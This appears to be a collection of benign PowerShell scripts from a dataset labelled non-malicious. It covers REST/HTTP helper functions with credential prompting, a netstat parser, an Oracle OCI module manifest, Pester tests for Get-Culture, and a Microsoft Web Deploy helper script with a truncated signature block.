$($result.Wait() | Out-String) # } if($waitForResponse) { $result = $result.Wait() } write-output $result trap [MindTouch.Dream.DreamResponseException] { Write-Error @" TRAPPED DreamResponseException $($_.Exception.Response | Out-String) $($_.Exception.Response.Headers | Out-String) "@ break; } } } } function Get-WebPageContent { #[CmdletBinding()] param( # [Parameter(Position=0,Mandatory=$true)] [string]$url , # [Parameter(Position=1,Mandatory=$false)] [string]$xpath="" , # [Parameter(Mandatory=$false)] [hashtable]$with=@{} , # [Parameter(Position=2,Mandatory=$false)] [switch]$AsXml ) BEGIN { $out = "Text"; if($AsXml) { $out="Xml" } } PROCESS { invoke-http get $url $with | receive-http $out $xpath } } new-alias gwpc Get-WebPageContent -EA "SilentlyContinue" new-alias http Invoke-Http -EA "SilentlyContinue" new-alias rcv Receive-Http -EA "SilentlyContinue" # function Get-Http { return Invoke-Http "GET" @args } # function New-Http { return Invoke-Http "PUT" @args } # function Update-Http { return Invoke-Http "POST" @args } # function Remove-Http { return Invoke-Http "DELETE" @args } # new-alias Set-Http Update-Http # new-alias Put-Http New-Http # new-alias Post-Http Update-Http # new-alias Delete-Http Remove-Http function Set-HttpDefaultUrl { PARAM ([uri]$baseUri=$(Read-Host "Please enter the base Uri for your RESTful web-service")) $global:url = $baseUri } function Set-HttpCredential { param($Credential=$(Get-CredentialBetter -Title "Http Authentication Request - $($global:url.Host)" ` -Message "Your login for $($global:url.Host)" ` -Domain $($global:url.Host)) ) if($Credential -is [System.Management.Automation.PSCredential]) { $global:HttpRestCredential = $Credential } elseif($Credential -is [System.Net.NetworkCredential]) { $global:HttpRestCredential = new-object System.Management.Automation.PSCredential $Credential.UserName, $(ConvertTo-SecureString $credential.Password) } } function Get-HttpCredential([switch]$Secure) { if(!$global:url) { Set-HttpDefaultUrl } if(!$global:HttpRestCredential) { Set-HttpCredential } if(!$Secure) { return $global:HttpRestCredential.GetNetworkCredential(); } else { return $global:HttpRestCredential } } # function Authenticate-Http { # PARAM($URL=@("users","authenticate"), $Credential = $(Get-HttpCredential)) # $plug = [MindTouch.Dream.Plug]::New( $global:url ) # $null = $plug.At("users", "authenticate").WithCredentials( $auth.UserName, $auth.Password ).Get() # } function Encode-Twice { param([string]$text) return [System.Web.HttpUtility]::UrlEncode( [System.Web.HttpUtility]::UrlEncode( $text ) ) } function Join-Url ( [uri]$baseUri=$global:url ) { $ofs="/";$BaseUrl = "" if($BaseUri -and $baseUri.AbsoluteUri) { $BaseUrl = "$($baseUri.AbsoluteUri.Trim('/'))/" } return [URI]"$BaseUrl$([string]::join("/",@($args)).TrimStart('/'))" } function ConvertTo-SecureString { Param([string]$input) $result = new-object System.Security.SecureString foreach($c in $input.ToCharArray()) { $result.AppendChar($c) } $result.MakeReadOnly() return $result } ## Unit-Test Get-FileName ## Should return TRUE ## (Get-FileName C:\\Windows\\System32\\Notepad.exe) -eq "C:\\Windows\\System32\\Notepad.exe" -and ## (Get-FileName C:\\Windows\\Notepad.exe C:\\Windows\\System32\\) -eq "C:\\Windows\\System32\\Notepad.exe" -and ## (Get-FileName WaitFor.exe C:\\Windows\\System32\\WaitForIt.exe) -eq "C:\\Windows\\System32\\WaitForIt.exe" -and ## (Get-FileName -Path C:\\Windows\\System32\\WaitForIt.exe) -eq "C:\\Windows\\System32\\WaitForIt.exe" function Get-FileName { param($fileName=$([IO.Path]::GetRandomFileName()), $path) $fileName = $fileName.trim("\\/""'") ## if the $Path has a file name, and it's folder exists: if($Path -and !(Test-Path $Path -Type Container) -and (Test-Path (Split-Path $path) -Type Container)) { $path ## if the $Path is just a folder (and it exists) } elseif($Path -and (Test-Path $path -Type Container)) { $fileName = Split-Path $fileName -leaf Join-Path $path $fileName ## If there's no valid $Path, and the $FileName has a folder... } elseif((Split-Path $fileName) -and (Test-Path (Split-Path $fileName))) { $fileName } else { Join-Path (Get-Location -PSProvider "FileSystem") (Split-Path $fileName -Leaf) } } function Get-UtcTime { Param($Format="yyyyMMddhhmmss") [DateTime]::Now.ToUniversalTime().ToString($Format) } ## Get-CredentialBetter ## An improvement over the default cmdlet which has no options ... ################################################################################################### ## History ## v 1.2 Refactor ShellIds key out to a variable, and wrap lines a bit ## v 1.1 Add -Console switch and set registry values accordingly (ouch) ## v 1.0 Add Title, Message, Domain, and UserName options to the Get-Credential cmdlet ################################################################################################### function Get-CredentialBetter{ PARAM([string]$UserName, [string]$Title, [string]$Message, [string]$Domain, [switch]$Console) $ShellIdKey = "HKLM:\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds" ## Carefully EA=SilentlyContinue because by default it's MISSING, not $False $cp = (Get-ItemProperty $ShellIdKey ConsolePrompting -ea "SilentlyContinue") ## Compare to $True, because by default it's $null ... $cp = $cp.ConsolePrompting -eq $True if($Console -and !$cp) { Set-ItemProperty $ShellIdKey ConsolePrompting $True } elseif(!$Console -and $Console.IsPresent -and $cp) { Set-ItemProperty $ShellIdKey ConsolePrompting $False } ## Now call the Host.UI method ... if they don't have one, we'll die, yay. $Host.UI.PromptForCredential($Title,$Message,$UserName,$Domain,"Generic","Default") ## BoyScouts: Leave everything better than you found it (I'm tempted to leave it = True) Set-ItemProperty $ShellIdKey ConsolePrompting $cp }
combined_dataset/train/non-malicious/Get-Netstat 1,3.ps1
Get-Netstat 1,3.ps1
$null, $null, $null, $null, $netstat = netstat -a -n -o $ps = Get-Process [regex]$regexTCP = '(?<Protocol>\\S+)\\s+(?<LAddress>\\S+):(?<LPort>\\S+)\\s+(?<RAddress>\\S+):(?<RPort>\\S+)\\s+(?<State>\\S+)\\s+(?<PID>\\S+)' [regex]$regexUDP = '(?<Protocol>\\S+)\\s+(?<LAddress>\\S+):(?<LPort>\\S+)\\s+(?<RAddress>\\S+):(?<RPort>\\S+)\\s+(?<PID>\\S+)' [psobject]$process = "" | Select-Object Protocol, LocalAddress, Localport, RemoteAddress, Remoteport, State, PID, ProcessName foreach ($net in $netstat) { switch -regex ($net.Trim()) { $regexTCP { $process = "" | Select-Object Protocol, LocalAddress, Localport, RemoteAddress, Remoteport, State, PID, ProcessName $process.Protocol = $matches.Protocol $process.LocalAddress = $matches.LAddress $process.Localport = $matches.LPort $process.RemoteAddress = $matches.RAddress $process.Remoteport = $matches.RPort $process.State = $matches.State $process.PID = $matches.PID $process.ProcessName = ( $ps | Where-Object {$_.Id -eq $matches.PID} ).ProcessName $process continue } $regexUDP { $process = "" | Select-Object Protocol, LocalAddress, Localport, RemoteAddress, Remoteport, State, PID, ProcessName $process.Protocol = $matches.Protocol $process.LocalAddress = $matches.LAddress $process.Localport = $matches.LPort $process.RemoteAddress = $matches.RAddress $process.Remoteport = $matches.RPort $process.State = $matches.State $process.PID = $matches.PID $process.ProcessName = ( $ps | Where-Object {$_.Id -eq $matches.PID} ).ProcessName $process continue } } }
combined_dataset/train/non-malicious/sample_44_88.ps1
sample_44_88.ps1
# # Module manifest for module 'OCI.PSModules.Workrequests' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Workrequests.dll' # Version number of this module. ModuleVersion = '83.1.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = 'bfd147d7-2910-4621-842b-b948c79cda01' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Workrequests Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '83.1.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Workrequests.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIWorkrequestsList', 'Get-OCIWorkrequestsWorkRequest', 'Get-OCIWorkrequestsWorkRequestErrorsList', 'Get-OCIWorkrequestsWorkRequestLogsList' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Workrequests' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/1914.ps1
1914.ps1
Describe "Get-Culture" -Tags "CI" { It "Should return a type of CultureInfo for Get-Culture cmdlet" { $culture = Get-Culture $culture | Should -BeOfType [CultureInfo] ($culture).EnglishName | Should -BeExactly $host.CurrentCulture.EnglishName Get-Culture -NoUserOverrides | Should -BeOfType [CultureInfo] } It "Should have (Get-Culture).Name variable be equivalent to `$PSCulture" { (Get-Culture).Name | Should -BeExactly $PsCulture } It "Should return the specified culture with '-Name' parameter" { $ci = Get-Culture -Name ru-RU $ci | Should -BeOfType [CultureInfo] $ci.Name | Should -BeExactly "ru-RU" $ci = Get-Culture -Name ru-RU -NoUserOverrides $ci | Should -BeOfType [CultureInfo] $ci.Name | Should -BeExactly "ru-RU" } It "Should return specified cultures with '-Name' parameter" { $ciArray = Get-Culture "", "ru-RU" $ciArray | Should -HaveCount 2 $ciArray[0] | Should -BeOfType [CultureInfo] $ciArray[0].EnglishName | Should -BeExactly "Invariant Language (Invariant Country)" $ciArray[1] | Should -BeOfType [CultureInfo] $ciArray[1].Name | Should -BeExactly "ru-RU" $ciArray[1].EnglishName | Should -BeExactly "Russian (Russia)" } It "Should accept values from a pipeline for '-Name' parameter" { $ciArray = "", "ru-RU" | Get-Culture $ciArray | Should -HaveCount 2 $ciArray[0] | Should -BeOfType [CultureInfo] $ciArray[0].EnglishName | Should -BeExactly "Invariant Language (Invariant Country)" $ciArray[1] | Should -BeOfType [CultureInfo] $ciArray[1].Name | Should -BeExactly "ru-RU" $ciArray[1].EnglishName | Should -BeExactly "Russian (Russia)" } It "Should return the culture array with '-ListAvailable' parameter" { $ciArray = Get-Culture -ListAvailable $ciArray.Count | Should -BeGreaterThan 0 $ciArray[0] | Should -BeOfType [CultureInfo] } It "Should write an error on unsupported culture name" { { Get-Culture -Name "abcdefghijkl" -ErrorAction Stop } | Should -PassThru -Throw -ErrorId "ParameterArgumentValidationError,Microsoft.PowerShell.Commands.GetCultureCommand" } } Describe "`$PSCulture" -Tags "CI" { It "`$PSCulture is the current thread culture" { $PSCulture | Should -BeExactly $([System.Threading.Thread]::CurrentThread.CurrentCulture.Name) } It "`$PSUICulture is the current thread culture" { $PSUICulture | Should -BeExactly $([System.Threading.Thread]::CurrentThread.CurrentUICulture.Name) } It "`$PSCulture follows the current thread culture" { $oldCulture = [CultureInfo]::CurrentCulture $newCulture = "ru-RU" if ($oldCulture -eq "ru-RU") { $newCulture = "fr-FR" } try { [CultureInfo]::currentculture = $newCulture $PSCulture | Should -BeExactly $newCulture $PSCulture | Should -BeExactly $([System.Threading.Thread]::CurrentThread.CurrentCulture.Name) } finally { [CultureInfo]::CurrentCulture = $oldCulture } } It "`$PSUICulture follows the current thread culture" { $oldUICulture = [CultureInfo]::CurrentUICulture $newUICulture = "ru-RU" if ($oldUICulture -eq "ru-RU") { $newUICulture = "fr-FR" } try { [CultureInfo]::CurrentUICulture = $newUICulture $PSUICulture | Should -BeExactly $newUICulture $PSUICulture | Should -BeExactly $([System.Threading.Thread]::CurrentThread.CurrentUICulture.Name) } finally { [CultureInfo]::CurrentUICulture = $oldUICulture } } }
combined_dataset/train/non-malicious/sample_29_20.ps1
sample_29_20.ps1
# Web Deploy: Powershell script which contains common functionality for other scripts to reference. # Copyright (C) Microsoft Corp. 2010 # # Requirements: IIS 7, Windows Server 2008 (or higher) # Import-LocalizedData -BindingVariable Resources -FileName Resources.psd1 #constants $Global:ScriptError = 0 $Global:Warning = 1 $Global:Info = 2 $Global:RegistryPath = "HKLM:\SOFTWARE\Microsoft\IIS Extensions\MSDeploy" # this function does logging function write-log([int]$type, [string]$info) { $message = $info -f $args $logMessage = get-date -format HH:mm:ss Switch($type){ $Global:ScriptError{ $logMessage = $logMessage + "`t" + $Resources.Error + "`t" + $message write-host -foregroundcolor white -backgroundcolor red $logMessage } $Global:Warning{ $logMessage = $logMessage + "`t" + $Resources.Warning + "`t" + $message write-host -foregroundcolor black -backgroundcolor yellow $logMessage } default{ $logMessage = $logMessage + "`t" + $Resources.Info + "`t" + $message write-host -foregroundcolor black -backgroundcolor green $logMessage } } } function Initialize { try { [System.Reflection.Assembly]::LoadFrom( ${env:windir} + "\system32\inetsrv\Microsoft.Web.Administration.dll" ) > $null } catch [System.Reflection.Assembly] { write-log $Global:ScriptError $Resources.CheckIIS7Installed throw } LoadLatestDeploymentDll } # Loads latest Web Deploy into session function LoadLatestDeploymentDll { try { push-location . set-location "HKLM:" $vers = @(Get-ChildItem $Global:RegistryPath) $i = $vers.Count-1 $ver = $null for($i; $i -ge 0; $i--) { $regPath = $vers[$i].Name $properties = Get-ItemProperty -LiteralPath $regPath if(($properties.Install -ne $null) -and $properties.Install -eq 1) { $v = New-Object Version -ArgumentList $properties.Version $ver = "$($v.Major).$($v.Minor).0.0" break } } if($ver -ne $null) { Add-Type -AssemblyName "microsoft.web.deployment, Version=$ver, Culture=neutral, PublicKeyToken=31bf3856ad364e35" } else { write-log $Global:ScriptError $Resources.CouldNotLoadDeploymentDll } } catch [Exception] { write-log $Global:ScriptError $Resources.CouldNotLoadDeploymentDll throw } finally { pop-location } if($e -ne $null) { throw $e } } # Verifies ExcludedProviders with providers that are installed. function VerifyAndDeleteExcludedProviders { param( [string] $SiteName, [System.Collections.ArrayList] $ExcludedProviders = $null, [Parameter(Mandatory=$true)] [string] $SectionName ) try { $serverManager = New-Object Microsoft.Web.Administration.ServerManager $appHostConfig = $serverManager.GetApplicationHostConfiguration() if($null -ne $ExcludedProviders) { if([string]::IsNullOrEmpty($SiteName)) { $configSection = $appHostConfig.GetSection($BackupSectionName) } else { $configSection = $appHostConfig.GetSection($BackupSectionName, $SiteName) } # Find the ExcludedProviders Element $configSection.ChildElements | out-null foreach($child in $configSection.ChildElements) { $excludedProvidersElem = $null if($child.Schema -is [Microsoft.Web.Administration.ConfigurationCollectionSchema] -and ` $child.Schema.AddElementNames -eq "provider") { $excludedProvidersElem = $child break } } $factories = [microsoft.web.deployment.deploymentmanager]::AvailableProviderFactories $duplicateProviders = @() $globalProviders = @(GetGlobalExcludedProviders -AppHostConfig $appHostConfig -SectionName $sectionName) $existingProvCollection = $excludedProvidersElem.GetCollection() $existingProviders = @() foreach($provider in $existingProvCollection) { $existingProviders += $provider.GetAttributeValue("name") } foreach($provider in $ExcludedProviders) { # Checking to see if provider is a valid provider that exists on this server $factory = $null foreach($f in $factories) { if($f.Name -like $provider) { $factory = $f break } } if($factory -eq $null) { $mesg = $Resources.ProviderDoesNotExist -f $provider write-log $Global:ScriptError $mesg throw new-object System.ArgumentException -ArgumentList $mesg } # Figure out if you should add the provider or not $globalOccurancesOfProvider = CountOccurancesOfStringInList -List $globalProviders -StringToCheck $provider # Check to see if the provider already exists at the global level if([string]::IsNullOrEmpty($SiteName)) { if($globalOccurancesOfProvider -gt 0) { $duplicateProviders += $provider } } else { # Check to see if the global list is the same as site list. Need to do this because config API's only # return the entire inherited list of providers. So we compare the list of global providers against the # list of site providers and figure out the difference. $siteOccurancesOfProvider = CountOccurancesOfStringInList -List $existingProviders -StringToCheck $provider if($siteOccurancesOfProvider -gt $globalOccurancesOfProvider) { $duplicateProviders += $provider } } } # Remove duplicate providers if necessary foreach($provider in $duplicateProviders) { $ExcludedProviders.Remove($provider) } } } finally { if($serverManager -ne $null) { $serverManager.Dispose() } } return $ExcludedProviders } function GetGlobalExcludedProviders { param( $appHostConfig, $sectionName ) $configSection = $appHostConfig.GetSection($sectionName) $existingProvCollection = @(GetExcludedProvidersColletion -configSection $configSection) $existingProviders = @() foreach($provider in $existingProvCollection) { $existingProviders += $provider.GetAttributeValue("name") } return $existingProviders } function RemoveDuplicatesFromList { param( [string[]] $list ) $hash = @{} foreach($s in $list) { $hash[$s] = $null } $arrayList = new-object -Type System.Collections.ArrayList -ArgumentList $hash.Keys return $arrayList } function CountOccurancesOfStringInList { param( [string[]] $list, [string] $stringToCheck ) $num = 0 foreach($s in $list) { if($s -like $stringToCheck) { $num++ } } return $num } function GetExcludedProvidersColletion { param( [Microsoft.Web.Administration.ConfigurationSection] $configSection ) # Find the ExcludedProviders Element $configSection.ChildElements | out-null foreach($child in $configSection.ChildElements) { $excludedProvidersElem = $null if($child.Schema -is [Microsoft.Web.Administration.ConfigurationCollectionSchema] -and ` $child.Schema.AddElementNames -eq "provider") { $excludedProvidersElem = $child break } } return $excludedProvidersElem.GetCollection() } function GetBackupSettingsProviderElem { param( [Microsoft.Web.Administration.ConfigurationSection] $configSection ) # Find the backupSettingsProvider Element $configSection.ChildElements | out-null foreach($child in $configSection.ChildElements) { if($child.Schema.Name -like $BackupSettingsProviderElemName) { $backupProviderElem = $child break } } return $backupProviderElem } # SIG # Begin signature block # MIIoPQYJKoZIhvcNAQcCoIIoLjCCKCoCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCA9sy+QDs9w1sqR # UQaShDSMfeF9fS+amxsYhGclB0vLLqCCDYUwggYDMIID66ADAgECAhMzAAADri01 # UchTj1UdAAAAAAOuMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwODU5WhcNMjQxMTE0MTkwODU5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQD0IPymNjfDEKg+YyE6SjDvJwKW1+pieqTjAY0CnOHZ1Nj5irGjNZPMlQ4HfxXG # yAVCZcEWE4x2sZgam872R1s0+TAelOtbqFmoW4suJHAYoTHhkznNVKpscm5fZ899 # QnReZv5WtWwbD8HAFXbPPStW2JKCqPcZ54Y6wbuWV9bKtKPImqbkMcTejTgEAj82 # 6GQc6/Th66Koka8cUIvz59e/IP04DGrh9wkq2jIFvQ8EDegw1B4KyJTIs76+hmpV # M5SwBZjRs3liOQrierkNVo11WuujB3kBf2CbPoP9MlOyyezqkMIbTRj4OHeKlamd # WaSFhwHLJRIQpfc8sLwOSIBBAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUhx/vdKmXhwc4WiWXbsf0I53h8T8w # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMTgzNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AGrJYDUS7s8o0yNprGXRXuAnRcHKxSjFmW4wclcUTYsQZkhnbMwthWM6cAYb/h2W # 5GNKtlmj/y/CThe3y/o0EH2h+jwfU/9eJ0fK1ZO/2WD0xi777qU+a7l8KjMPdwjY # 0tk9bYEGEZfYPRHy1AGPQVuZlG4i5ymJDsMrcIcqV8pxzsw/yk/O4y/nlOjHz4oV # APU0br5t9tgD8E08GSDi3I6H57Ftod9w26h0MlQiOr10Xqhr5iPLS7SlQwj8HW37 # ybqsmjQpKhmWul6xiXSNGGm36GarHy4Q1egYlxhlUnk3ZKSr3QtWIo1GGL03hT57 # xzjL25fKiZQX/q+II8nuG5M0Qmjvl6Egltr4hZ3e3FQRzRHfLoNPq3ELpxbWdH8t # Nuj0j/x9Crnfwbki8n57mJKI5JVWRWTSLmbTcDDLkTZlJLg9V1BIJwXGY3i2kR9i # 5HsADL8YlW0gMWVSlKB1eiSlK6LmFi0rVH16dde+j5T/EaQtFz6qngN7d1lvO7uk # 6rtX+MLKG4LDRsQgBTi6sIYiKntMjoYFHMPvI/OMUip5ljtLitVbkFGfagSqmbxK # 7rJMhC8wiTzHanBg1Rrbff1niBbnFbbV4UDmYumjs1FIpFCazk6AADXxoKCo5TsO # zSHqr9gHgGYQC2hMyX9MGLIpowYCURx3L7kUiGbOiMwaMIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGg4wghoKAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAOuLTVRyFOPVR0AAAAA # A64wDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIHXd # m8Gf5RHQmPtKJOAqEgGkr/6+rmV9Y2eAgZW6OZ8/MEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEA8uoSa5d3fJPcXekuCBUCXWhYSIKP9f3i5aQG # ZycU3jajOrmwgTyxAptGAyt69Ehv6w0/4nQC3DTbOjU81yXwVa+oSs+vZfpSN9xc # TrNIbqsdE/fyPA3Mznp1av8uqj0ytVqdqnfT//CTgzz0a5xB/ekYRZTK/6qN5H8v # 